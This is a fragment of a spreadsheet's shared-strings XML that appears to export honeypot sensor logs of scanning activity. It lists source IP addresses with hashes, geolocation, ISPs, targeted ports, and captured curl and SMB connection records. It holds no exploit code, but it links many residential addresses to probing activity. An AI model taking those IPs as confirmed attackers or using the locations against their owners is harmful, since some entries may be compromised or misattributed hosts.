    <t>SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H41</t>
  </si>
  <si>
    <t>23&amp;&amp;46355&amp;&amp;80&amp;&amp;9100&amp;&amp;NA&amp;&amp;37762&amp;&amp;33993&amp;&amp;34014</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc85:1e01</t>
  </si>
  <si>
    <t>2c011b7af8433168d5c7a0b555b82322</t>
  </si>
  <si>
    <t>195.181.97.163</t>
  </si>
  <si>
    <t>Bushehr</t>
  </si>
  <si>
    <t>Deyr</t>
  </si>
  <si>
    <t>136280</t>
  </si>
  <si>
    <t>27.8399</t>
  </si>
  <si>
    <t>51.9378</t>
  </si>
  <si>
    <t>Telecommunication Company of Boushehr</t>
  </si>
  <si>
    <t>::ffff:c3b5:61a3</t>
  </si>
  <si>
    <t>788bb41821265720b9560a142ef2b384</t>
  </si>
  <si>
    <t>117.223.93.90</t>
  </si>
  <si>
    <t>::ffff:75df:5d5a</t>
  </si>
  <si>
    <t>b2a51ec9a1be25909b3e859fb2e6a85c</t>
  </si>
  <si>
    <t>173.21.4.95</t>
  </si>
  <si>
    <t>30036</t>
  </si>
  <si>
    <t>Mediacom Communications Corp</t>
  </si>
  <si>
    <t>2008-05-19</t>
  </si>
  <si>
    <t>MEDIACOM-RESIDENTIAL-CUST</t>
  </si>
  <si>
    <t>::ffff:ad15:45f</t>
  </si>
  <si>
    <t>3efcd33fe6dd566a013f32bdd982dabc</t>
  </si>
  <si>
    <t>124.143.95.84</t>
  </si>
  <si>
    <t>124-143-95-84.rev.home.ne.jp&amp;&amp;NA</t>
  </si>
  <si>
    <t>Suginami</t>
  </si>
  <si>
    <t>Suginami-ku</t>
  </si>
  <si>
    <t>1851510</t>
  </si>
  <si>
    <t>35.7048</t>
  </si>
  <si>
    <t>139.623</t>
  </si>
  <si>
    <t>9824</t>
  </si>
  <si>
    <t>Jupiter Telecommunication Co. Ltd</t>
  </si>
  <si>
    <t>::ffff:7c8f:5f54</t>
  </si>
  <si>
    <t>42dcb878b9679ed016e3b28dbb42c572</t>
  </si>
  <si>
    <t>187.94.39.149</t>
  </si>
  <si>
    <t>José Bonifácio</t>
  </si>
  <si>
    <t>3459667</t>
  </si>
  <si>
    <t>-21.0528</t>
  </si>
  <si>
    <t>-49.6883</t>
  </si>
  <si>
    <t>262684</t>
  </si>
  <si>
    <t>AS262684</t>
  </si>
  <si>
    <t>Net New Ltda</t>
  </si>
  <si>
    <t>::ffff:bb5e:2795</t>
  </si>
  <si>
    <t>ea057559cdf55151cc3ae1d9660420b5</t>
  </si>
  <si>
    <t>59.182.247.2</t>
  </si>
  <si>
    <t>::ffff:3bb6:f702</t>
  </si>
  <si>
    <t>8920fa790586afd62352fe7ac88536a1</t>
  </si>
  <si>
    <t>61.1.247.45</t>
  </si>
  <si>
    <t>::ffff:3d01:f72d</t>
  </si>
  <si>
    <t>0dfa9abef4db9c3a341ce42c9e000495</t>
  </si>
  <si>
    <t>179.25.78.89</t>
  </si>
  <si>
    <t>r179-25-78-89.dialup.adsl.anteldata.net.uy</t>
  </si>
  <si>
    <t>::ffff:b319:4e59</t>
  </si>
  <si>
    <t>05b801eda32a2b915ef8ad9bc4e80eaa</t>
  </si>
  <si>
    <t>117.195.60.14</t>
  </si>
  <si>
    <t>::ffff:75c3:3c0e</t>
  </si>
  <si>
    <t>ca2d7c3198670278726e506e076983f2</t>
  </si>
  <si>
    <t>117.208.252.19</t>
  </si>
  <si>
    <t>::ffff:75d0:fc13</t>
  </si>
  <si>
    <t>f94279edca9aed4e2ea63d237dc3d88e</t>
  </si>
  <si>
    <t>117.194.220.4</t>
  </si>
  <si>
    <t>::ffff:75c2:dc04</t>
  </si>
  <si>
    <t>270debfff9ddfd2c4ed38807786430ce</t>
  </si>
  <si>
    <t>117.199.242.177</t>
  </si>
  <si>
    <t>::ffff:75c7:f2b1</t>
  </si>
  <si>
    <t>2257f7ef9673e6af14e10738e3526a7f</t>
  </si>
  <si>
    <t>120.59.189.148</t>
  </si>
  <si>
    <t>::ffff:783b:bd94</t>
  </si>
  <si>
    <t>fa76dcc5cf34e9a129515f4f1a109f92</t>
  </si>
  <si>
    <t>59.92.174.48</t>
  </si>
  <si>
    <t>::ffff:3b5c:ae30</t>
  </si>
  <si>
    <t>be68b10cb0a6797d9851519105e04c04</t>
  </si>
  <si>
    <t>59.184.51.17</t>
  </si>
  <si>
    <t>::ffff:3bb8:3311</t>
  </si>
  <si>
    <t>8dbeb8a28dccd83a6928fd6722973fc7</t>
  </si>
  <si>
    <t>109.170.168.129</t>
  </si>
  <si>
    <t>NA&amp;&amp;109-170-168-129.xdsl.murphx.net</t>
  </si>
  <si>
    <t>SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>Hampshire</t>
  </si>
  <si>
    <t>Eastleigh</t>
  </si>
  <si>
    <t>2650396</t>
  </si>
  <si>
    <t>SO50</t>
  </si>
  <si>
    <t>50.9689</t>
  </si>
  <si>
    <t>-1.35063</t>
  </si>
  <si>
    <t>5413</t>
  </si>
  <si>
    <t>Daisy Corporate Services Trading Ltd</t>
  </si>
  <si>
    <t>Daisy Communications</t>
  </si>
  <si>
    <t>Daisy Wholesale Ltd</t>
  </si>
  <si>
    <t>{Data_HTTP:{'Content-Length': '0', 'Host': '154.26.156.60:80', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_TELNET:NA}</t>
  </si>
  <si>
    <t>2001-02-10 19:29:01</t>
  </si>
  <si>
    <t>2026-02-10 19:29:01</t>
  </si>
  <si>
    <t>2025-01-20 09:14:25</t>
  </si>
  <si>
    <t>['AUTH1.DNS.GXN.NET', 'AUTH2.DNS.GXN.NET', 'AUTH3.DNS.GXN.NET', 'AUTH4.DNS.GXN.NET']</t>
  </si>
  <si>
    <t>::ffff:6daa:a881</t>
  </si>
  <si>
    <t>7c71ae822e3e7eb04107a1b6f407d3de</t>
  </si>
  <si>
    <t>187.24.11.78</t>
  </si>
  <si>
    <t>Ourolândia</t>
  </si>
  <si>
    <t>3455690</t>
  </si>
  <si>
    <t>-10.9714</t>
  </si>
  <si>
    <t>-41.0796</t>
  </si>
  <si>
    <t>22085</t>
  </si>
  <si>
    <t>Claro S/A</t>
  </si>
  <si>
    <t>::ffff:bb18:b4e</t>
  </si>
  <si>
    <t>6fad1049d0d8cf7eaa630c68c1abff9d</t>
  </si>
  <si>
    <t>220.121.146.94</t>
  </si>
  <si>
    <t>::ffff:dc79:925e</t>
  </si>
  <si>
    <t>41bb13ee566ac3ef09e822900b98d992</t>
  </si>
  <si>
    <t>117.195.209.218</t>
  </si>
  <si>
    <t>::ffff:75c3:d1da</t>
  </si>
  <si>
    <t>07c2af1f3f571d3cb58e44533a3d49f9</t>
  </si>
  <si>
    <t>61.3.52.5</t>
  </si>
  <si>
    <t>::ffff:3d03:3405</t>
  </si>
  <si>
    <t>d1e34d522ffaa0ff7a912602d9c02073</t>
  </si>
  <si>
    <t>46.119.101.221</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_HTTPS_H40&amp;&amp;SMA-LAB_SIP_H28&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_HTTPS_H15&amp;&amp;SMA-LAB_IRC_H25&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H45</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;443&amp;&amp;5060&amp;&amp;24092&amp;&amp;443&amp;&amp;6667&amp;&amp;58850&amp;&amp;NA&amp;&amp;25758</t>
  </si>
  <si>
    <t>::ffff:2e77:65dd</t>
  </si>
  <si>
    <t>0e82d89d4f0c601a71ae550cb93ba338</t>
  </si>
  <si>
    <t>61.238.219.227</t>
  </si>
  <si>
    <t>061238219227.ctinets.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:3dee:dbe3</t>
  </si>
  <si>
    <t>286af25aa4517c5624cca2d0c565535d</t>
  </si>
  <si>
    <t>59.95.188.209</t>
  </si>
  <si>
    <t>::ffff:3b5f:bcd1</t>
  </si>
  <si>
    <t>8ad1a308db0ff71fcbfd210129e822e3</t>
  </si>
  <si>
    <t>117.193.251.49</t>
  </si>
  <si>
    <t>::ffff:75c1:fb31</t>
  </si>
  <si>
    <t>9ff6db6563d6b8887f8fcb3442fd8720</t>
  </si>
  <si>
    <t>103.163.36.230</t>
  </si>
  <si>
    <t>::ffff:67a3:24e6</t>
  </si>
  <si>
    <t>c0d2980d99edec8808455144540f0d29</t>
  </si>
  <si>
    <t>117.242.55.234</t>
  </si>
  <si>
    <t>::ffff:75f2:37ea</t>
  </si>
  <si>
    <t>a541a962ebc3d1f4dc34274b73b5bb08</t>
  </si>
  <si>
    <t>117.251.171.156</t>
  </si>
  <si>
    <t>::ffff:75fb:ab9c</t>
  </si>
  <si>
    <t>5064b856b4ae883595f19dad25a9e625</t>
  </si>
  <si>
    <t>213.43.177.189</t>
  </si>
  <si>
    <t>::ffff:d52b:b1bd</t>
  </si>
  <si>
    <t>ec486abf1c4280aad547b21541b86059</t>
  </si>
  <si>
    <t>5.200.154.0</t>
  </si>
  <si>
    <t>Bandar-e Torkaman</t>
  </si>
  <si>
    <t>141653</t>
  </si>
  <si>
    <t>36.9012</t>
  </si>
  <si>
    <t>54.0719</t>
  </si>
  <si>
    <t>First</t>
  </si>
  <si>
    <t>::ffff:5c8:9a00</t>
  </si>
  <si>
    <t>277c63f4b8fa7601d7da8dc64a113fe5</t>
  </si>
  <si>
    <t>113.22.85.16</t>
  </si>
  <si>
    <t>Hai Bà Trưng District</t>
  </si>
  <si>
    <t>Hai BàTrưng</t>
  </si>
  <si>
    <t>8616127</t>
  </si>
  <si>
    <t>21.0134</t>
  </si>
  <si>
    <t>::ffff:7116:5510</t>
  </si>
  <si>
    <t>8622758d9f0a6c78e631dde1d6352140</t>
  </si>
  <si>
    <t>209.38.90.181</t>
  </si>
  <si>
    <t>::ffff:d126:5ab5</t>
  </si>
  <si>
    <t>9943f241a1fd98b5619fc90eff3a9314</t>
  </si>
  <si>
    <t>45.228.201.87</t>
  </si>
  <si>
    <t>30000-000</t>
  </si>
  <si>
    <t>-19.9191</t>
  </si>
  <si>
    <t>-43.9387</t>
  </si>
  <si>
    <t>271108</t>
  </si>
  <si>
    <t>HBA TELECOM LTDA - ME</t>
  </si>
  <si>
    <t>::ffff:2de4:c957</t>
  </si>
  <si>
    <t>e0908c2a9d0243de5ccf504ace7c138c</t>
  </si>
  <si>
    <t>61.3.221.215</t>
  </si>
  <si>
    <t>::ffff:3d03:ddd7</t>
  </si>
  <si>
    <t>d720ab110f436bccacbd6e231eceafb6</t>
  </si>
  <si>
    <t>116.103.34.226</t>
  </si>
  <si>
    <t>::ffff:7467:22e2</t>
  </si>
  <si>
    <t>e55f4200fb62eca0b01b3fc0cb7ce127</t>
  </si>
  <si>
    <t>117.255.67.116</t>
  </si>
  <si>
    <t>::ffff:75ff:4374</t>
  </si>
  <si>
    <t>21de655c9b7e56b4817241be9cf91de1</t>
  </si>
  <si>
    <t>77.28.185.169</t>
  </si>
  <si>
    <t>Skopje</t>
  </si>
  <si>
    <t>785842</t>
  </si>
  <si>
    <t>41.9965</t>
  </si>
  <si>
    <t>21.4314</t>
  </si>
  <si>
    <t>::ffff:4d1c:b9a9</t>
  </si>
  <si>
    <t>03664925f44b0c60da44ee87d9e5a481</t>
  </si>
  <si>
    <t>103.186.120.72</t>
  </si>
  <si>
    <t>SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_SSH_H34&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_H36&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_SMB_H23&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>445&amp;&amp;1433&amp;&amp;22&amp;&amp;31521</t>
  </si>
  <si>
    <t>Pondicherry</t>
  </si>
  <si>
    <t>1259425</t>
  </si>
  <si>
    <t>11.9338</t>
  </si>
  <si>
    <t>79.8298</t>
  </si>
  <si>
    <t>141552</t>
  </si>
  <si>
    <t>Interjet India Private Limited</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.186.120.72,60103)}&amp;&amp;{Data_SMB:Incoming connection (103.186.120.72,60787)}&amp;&amp;{Data_SMB:Incoming connection (103.186.120.72,56553)}&amp;&amp;{Data_SMB:Incoming connection (103.186.120.72,57031)}&amp;&amp;{Data_SMB:Incoming connection (103.186.120.72,49599)}&amp;&amp;{Data_SMB:Incoming connection (103.186.120.72,50088)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.186.120.72,64959)}&amp;&amp;{Data_SMB:Incoming connection (103.186.120.72,50181)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.186.120.72,61528)}&amp;&amp;{Data_SMB:Incoming connection (103.186.120.72,64671)}&amp;&amp;{Data_SMB:Incoming connection (103.186.120.72,65145)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.186.120.72,56781)}&amp;&amp;{Data_SMB:Incoming connection (103.186.120.72,57315)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.186.120.72,52651)}&amp;&amp;{Data_SMB:Incoming connection (103.186.120.72,53071)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:67ba:7848</t>
  </si>
  <si>
    <t>543ea1a1f18a4d981e8b8346ae0b2e61</t>
  </si>
  <si>
    <t>94.252.230.19</t>
  </si>
  <si>
    <t>SY</t>
  </si>
  <si>
    <t>Syria</t>
  </si>
  <si>
    <t>DI</t>
  </si>
  <si>
    <t>Dimashq</t>
  </si>
  <si>
    <t>Damascus</t>
  </si>
  <si>
    <t>170654</t>
  </si>
  <si>
    <t>33.5132</t>
  </si>
  <si>
    <t>36.2768</t>
  </si>
  <si>
    <t>29256</t>
  </si>
  <si>
    <t>INT-PDN-STE-AS</t>
  </si>
  <si>
    <t>Syriatel-Mobile</t>
  </si>
  <si>
    <t>::ffff:5efc:e613</t>
  </si>
  <si>
    <t>51de0bec7be8f286398e0361fa1489ea</t>
  </si>
  <si>
    <t>59.182.183.216</t>
  </si>
  <si>
    <t>Piravam</t>
  </si>
  <si>
    <t>1259541</t>
  </si>
  <si>
    <t>9.86667</t>
  </si>
  <si>
    <t>76.5</t>
  </si>
  <si>
    <t>::ffff:3bb6:b7d8</t>
  </si>
  <si>
    <t>cf32393dfa66508fadbaec6037dc476d</t>
  </si>
  <si>
    <t>59.93.137.8</t>
  </si>
  <si>
    <t>::ffff:3b5d:8908</t>
  </si>
  <si>
    <t>6d94d8e524458398ae10e6850e2f52d0</t>
  </si>
  <si>
    <t>41.59.222.92</t>
  </si>
  <si>
    <t>::ffff:293b:de5c</t>
  </si>
  <si>
    <t>0bc16816b5b66582a74ed01e9f877459</t>
  </si>
  <si>
    <t>117.207.246.253</t>
  </si>
  <si>
    <t>::ffff:75cf:f6fd</t>
  </si>
  <si>
    <t>42be30fcad7c5517efb295df42c70259</t>
  </si>
  <si>
    <t>117.206.133.39</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>50132&amp;&amp;23</t>
  </si>
  <si>
    <t>::ffff:75ce:8527</t>
  </si>
  <si>
    <t>8948ef1d6f2e153a7d5a5b8c02bf9d5d</t>
  </si>
  <si>
    <t>157.15.0.158</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H26</t>
  </si>
  <si>
    <t>Kabupaten Nganjuk</t>
  </si>
  <si>
    <t>Kertosono</t>
  </si>
  <si>
    <t>1640185</t>
  </si>
  <si>
    <t>-7.63968</t>
  </si>
  <si>
    <t>112.016</t>
  </si>
  <si>
    <t>152769</t>
  </si>
  <si>
    <t>PT Gopal Network Solusindo</t>
  </si>
  <si>
    <t>Gopalnet</t>
  </si>
  <si>
    <t>2024-01-22</t>
  </si>
  <si>
    <t>IDNIC-GOPALNET-ID</t>
  </si>
  <si>
    <t>::ffff:9d0f:9e</t>
  </si>
  <si>
    <t>2a5724747c93068cba12b780c05c4fb6</t>
  </si>
  <si>
    <t>117.208.210.213</t>
  </si>
  <si>
    <t>::ffff:75d0:d2d5</t>
  </si>
  <si>
    <t>b0f63ab6a5b32af79af786ba12c8302e</t>
  </si>
  <si>
    <t>125.235.229.152</t>
  </si>
  <si>
    <t>Huyện Dầu Tiêng</t>
  </si>
  <si>
    <t>Dầu Tiếng</t>
  </si>
  <si>
    <t>1583699</t>
  </si>
  <si>
    <t>11.2741</t>
  </si>
  <si>
    <t>106.359</t>
  </si>
  <si>
    <t>::ffff:7deb:e598</t>
  </si>
  <si>
    <t>9da73327cea84396d55254d806c57be6</t>
  </si>
  <si>
    <t>61.3.49.32</t>
  </si>
  <si>
    <t>West Godavari</t>
  </si>
  <si>
    <t>Tādepallegūdem</t>
  </si>
  <si>
    <t>1255264</t>
  </si>
  <si>
    <t>16.8147</t>
  </si>
  <si>
    <t>81.5272</t>
  </si>
  <si>
    <t>::ffff:3d03:3120</t>
  </si>
  <si>
    <t>36fdc45e5aa78287550832a9e1e32846</t>
  </si>
  <si>
    <t>117.193.178.53</t>
  </si>
  <si>
    <t>::ffff:75c1:b235</t>
  </si>
  <si>
    <t>2da6580bded9e093bd7d41981336a4dc</t>
  </si>
  <si>
    <t>115.96.26.228</t>
  </si>
  <si>
    <t>Chakapara</t>
  </si>
  <si>
    <t>1348753</t>
  </si>
  <si>
    <t>22.6322</t>
  </si>
  <si>
    <t>88.3486</t>
  </si>
  <si>
    <t>::ffff:7360:1ae4</t>
  </si>
  <si>
    <t>e0180056058a604ffdb9faadd7fb515b</t>
  </si>
  <si>
    <t>117.199.155.52</t>
  </si>
  <si>
    <t>::ffff:75c7:9b34</t>
  </si>
  <si>
    <t>125a70c2282c5cb42d7463e26a78290e</t>
  </si>
  <si>
    <t>117.241.183.40</t>
  </si>
  <si>
    <t>::ffff:75f1:b728</t>
  </si>
  <si>
    <t>e173222ab8685097be7b5065eb7486c4</t>
  </si>
  <si>
    <t>95.9.237.203</t>
  </si>
  <si>
    <t>Erzurum</t>
  </si>
  <si>
    <t>315368</t>
  </si>
  <si>
    <t>39.9055</t>
  </si>
  <si>
    <t>41.2658</t>
  </si>
  <si>
    <t>::ffff:5f09:edcb</t>
  </si>
  <si>
    <t>80d58dc773e06e79c466ca8796efc589</t>
  </si>
  <si>
    <t>117.205.116.127</t>
  </si>
  <si>
    <t>::ffff:75cd:747f</t>
  </si>
  <si>
    <t>5a994029dbf9c5eca3eace61713062da</t>
  </si>
  <si>
    <t>14.191.94.167</t>
  </si>
  <si>
    <t>Quận Mười</t>
  </si>
  <si>
    <t>9645085</t>
  </si>
  <si>
    <t>10.7682</t>
  </si>
  <si>
    <t>106.666</t>
  </si>
  <si>
    <t>::ffff:ebf:5ea7</t>
  </si>
  <si>
    <t>c08eff7444219a497371140a4f8e0e39</t>
  </si>
  <si>
    <t>98.175.194.217</t>
  </si>
  <si>
    <t>wsip-98-175-194-217.om.om.cox.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>NE</t>
  </si>
  <si>
    <t>Nebraska</t>
  </si>
  <si>
    <t>Douglas</t>
  </si>
  <si>
    <t>Omaha</t>
  </si>
  <si>
    <t>5074472</t>
  </si>
  <si>
    <t>68197</t>
  </si>
  <si>
    <t>41.2565</t>
  </si>
  <si>
    <t>-95.9345</t>
  </si>
  <si>
    <t>Cox Communications</t>
  </si>
  <si>
    <t>2007-07-20</t>
  </si>
  <si>
    <t>CXA</t>
  </si>
  <si>
    <t>::ffff:62af:c2d9</t>
  </si>
  <si>
    <t>8e741c6192fec284a8db07d20b590d37</t>
  </si>
  <si>
    <t>117.5.185.51</t>
  </si>
  <si>
    <t>::ffff:7505:b933</t>
  </si>
  <si>
    <t>e0af3bb7d689c5d8ddf6b7fe595e0466</t>
  </si>
  <si>
    <t>117.235.146.122</t>
  </si>
  <si>
    <t>::ffff:75eb:927a</t>
  </si>
  <si>
    <t>865f28534e9ef64be75c24e4fc73042c</t>
  </si>
  <si>
    <t>103.8.185.158</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MYSQL_H26&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_POSTGRES_H44&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_MSSQL_H24&amp;&amp;SMA-LAB_SMB_H26&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_SMB_H6</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;3306&amp;&amp;445&amp;&amp;5432</t>
  </si>
  <si>
    <t>-6.19445</t>
  </si>
  <si>
    <t>4800</t>
  </si>
  <si>
    <t>PT Aplikanusa Lintasarta</t>
  </si>
  <si>
    <t>Green Net Co., Ltd.</t>
  </si>
  <si>
    <t>2022-09-20</t>
  </si>
  <si>
    <t>IDNIC-ZABRINA-ID</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:Incoming connection (103.8.185.158,47350)}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.8.185.158,63285)}&amp;&amp;{Data_SMB:Incoming connection (103.8.185.158,65443)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.8.185.158,36282)}&amp;&amp;{Data_SMB:Incoming connection (103.8.185.158,39935)}&amp;&amp;{Data_SMB:Incoming connection (103.8.185.158,28687)}&amp;&amp;{Data_SMB:Incoming connection (103.8.185.158,32099)}&amp;&amp;{Data_SMB:Incoming connection (103.8.185.158,58156)}&amp;&amp;{Data_SMB:Incoming connection (103.8.185.158,60333)}&amp;&amp;{Data_SMB:Incoming connection (103.8.185.158,56560)}&amp;&amp;{Data_SMB:Incoming connection (103.8.185.158,58151)}&amp;&amp;{Data_SMB:Incoming connection (103.8.185.158,41776)}&amp;&amp;{Data_SMB:Incoming connection (103.8.185.158,43425)}</t>
  </si>
  <si>
    <t>::ffff:6708:b99e</t>
  </si>
  <si>
    <t>fa60be53d18cdcc89b813d77ee258bcf</t>
  </si>
  <si>
    <t>59.184.51.50</t>
  </si>
  <si>
    <t>::ffff:3bb8:3332</t>
  </si>
  <si>
    <t>a1bc31689868559c48cf4c8f2714ef1f</t>
  </si>
  <si>
    <t>176.91.244.117</t>
  </si>
  <si>
    <t>::ffff:b05b:f475</t>
  </si>
  <si>
    <t>c87d756cc80280e173057a8bca48c861</t>
  </si>
  <si>
    <t>88.235.83.166</t>
  </si>
  <si>
    <t>::ffff:58eb:53a6</t>
  </si>
  <si>
    <t>ae90d09e598c78267798052918f01279</t>
  </si>
  <si>
    <t>59.178.12.103</t>
  </si>
  <si>
    <t>::ffff:3bb2:c67</t>
  </si>
  <si>
    <t>9ce494b06e6ed4f4ed968f2f3c879fc1</t>
  </si>
  <si>
    <t>1.20.238.1</t>
  </si>
  <si>
    <t>TOT Mobile Co LTD</t>
  </si>
  <si>
    <t>::ffff:114:ee01</t>
  </si>
  <si>
    <t>79bacefa4d35923a1a98179f8d3d021f</t>
  </si>
  <si>
    <t>117.248.47.250</t>
  </si>
  <si>
    <t>::ffff:75f8:2ffa</t>
  </si>
  <si>
    <t>9d0f201a7c9327dcbad0c1da1145291a</t>
  </si>
  <si>
    <t>116.72.2.182</t>
  </si>
  <si>
    <t>1433&amp;&amp;445&amp;&amp;53052&amp;&amp;53938</t>
  </si>
  <si>
    <t>2007-05-04</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (116.72.2.182,53052)}&amp;&amp;{Data_SMB:Incoming connection (116.72.2.182,53938)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:7448:2b6</t>
  </si>
  <si>
    <t>ab960c1368ffefa894f25ca1e034a73e</t>
  </si>
  <si>
    <t>59.89.213.207</t>
  </si>
  <si>
    <t>::ffff:3b59:d5cf</t>
  </si>
  <si>
    <t>e9bf6a61910b881ccebfe99a07e13320</t>
  </si>
  <si>
    <t>117.199.195.242</t>
  </si>
  <si>
    <t>::ffff:75c7:c3f2</t>
  </si>
  <si>
    <t>e22a35c5551c7cd66979d474027c559d</t>
  </si>
  <si>
    <t>117.199.62.139</t>
  </si>
  <si>
    <t>::ffff:75c7:3e8b</t>
  </si>
  <si>
    <t>31e597561e83baac6fcbca3b0eff231f</t>
  </si>
  <si>
    <t>59.182.148.54</t>
  </si>
  <si>
    <t>::ffff:3bb6:9436</t>
  </si>
  <si>
    <t>f711a5d8da5c8b6985459892645e08cc</t>
  </si>
  <si>
    <t>103.241.232.205</t>
  </si>
  <si>
    <t>::ffff:67f1:e8cd</t>
  </si>
  <si>
    <t>c6c492cfd20889bd47f2bb83bb92aeda</t>
  </si>
  <si>
    <t>185.22.213.2</t>
  </si>
  <si>
    <t>rev-185-22-213-2.radiolan.sk&amp;&amp;NA</t>
  </si>
  <si>
    <t>BL</t>
  </si>
  <si>
    <t>Bratislava Region</t>
  </si>
  <si>
    <t>Okres Bratislava IV</t>
  </si>
  <si>
    <t>Karlova Ves</t>
  </si>
  <si>
    <t>3059564</t>
  </si>
  <si>
    <t>48.1608</t>
  </si>
  <si>
    <t>17.0463</t>
  </si>
  <si>
    <t>43451</t>
  </si>
  <si>
    <t>Slovanet a.s.</t>
  </si>
  <si>
